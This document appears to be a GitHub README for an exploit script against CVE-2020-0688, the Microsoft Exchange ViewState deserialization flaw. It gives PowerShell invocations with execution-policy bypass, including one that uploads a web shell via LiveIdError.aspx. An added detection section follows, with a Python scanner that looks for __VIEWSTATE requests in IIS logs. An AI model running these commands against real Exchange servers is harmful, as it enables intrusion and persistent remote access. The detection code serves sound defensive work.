mahyarx/Exploit_CVE-2020-0688

CVE-2020-0688

Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"

Usage:

powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml <XAML PATH> -uri <default|liveiderror|...>

Example:

This is an example of vulnerability validation by setting a header in the response.

powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Set-Header.xml -uri default
__VIEWSTATEGENERATOR=
B97B4E27

__VIEWSTATE=

This is an example of vulnerability validation by setting a string in the response.

powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Set-Response.xml -uri default

__VIEWSTATEGENERATOR=
B97B4E27

__VIEWSTATE=

This is an example of uploading a shell via LiveIdError.aspx.

powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Upload-Shell.xml -uri liveiderror

__VIEWSTATEGENERATOR=
31563A0D

__VIEWSTATE=
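Detection note (added example, not part of this repository): the script prints a __VIEWSTATEGENERATOR / __VIEWSTATE pair for each target page, so one way to hunt for its use is to scan IIS W3C logs for requests that carry __VIEWSTATE in the query string. The /ecp/ path prefix, the assumption that the values arrive as query parameters, the function name and the sample log lines are assumptions made for this example.

```python
from urllib.parse import parse_qs

# __VIEWSTATEGENERATOR values printed in this README's examples
README_GENERATORS = {"B97B4E27", "31563A0D"}

# Constructed sample IIS W3C log (paths, addresses and values are made up)
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2020-03-01 10:00:01 GET /ecp/default.aspx - 198.51.100.7 200
2020-03-01 10:00:09 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyAAAA 198.51.100.7 500
2020-03-01 10:01:30 GET /owa/auth/logon.aspx url=https%3A%2F%2Fmail.example.test%2Fowa 203.0.113.5 200
2020-03-01 10:02:12 GET /ecp/LiveIdError.aspx __VIEWSTATE=%2FwEyBBBB&__VIEWSTATEGENERATOR=31563A0D 198.51.100.7 500
"""

def find_viewstate_in_query(log_text, path_prefix="/ecp/"):
    """Return one record per request under path_prefix whose query has __VIEWSTATE."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue                           # other directives, blanks, headerless rows
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "")
        if not stem.lower().startswith(path_prefix):
            continue
        # IIS logs "-" for an empty query; parse_qs turns that into {}
        query = parse_qs(row.get("cs-uri-query", ""))
        params = {k.upper(): v[0] for k, v in query.items()}
        if "__VIEWSTATE" not in params:
            continue
        gen = params.get("__VIEWSTATEGENERATOR", "").upper()
        hits.append({
            "time": f'{row.get("date", "")} {row.get("time", "")}',
            "client": row.get("c-ip", ""),
            "path": stem,
            "generator": gen,
            "generator_in_readme": gen in README_GENERATORS,
            "viewstate_len": len(params["__VIEWSTATE"]),
            "status": row.get("sc-status", ""),
        })
    return hits

if __name__ == "__main__":
    for hit in find_viewstate_in_query(SAMPLE_LOG):
        print(hit)
```

A hit is a lead to correlate with the authenticated session and with process activity on the server at the same timestamp. A generator value outside README_GENERATORS is still reported, since the value differs per page.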
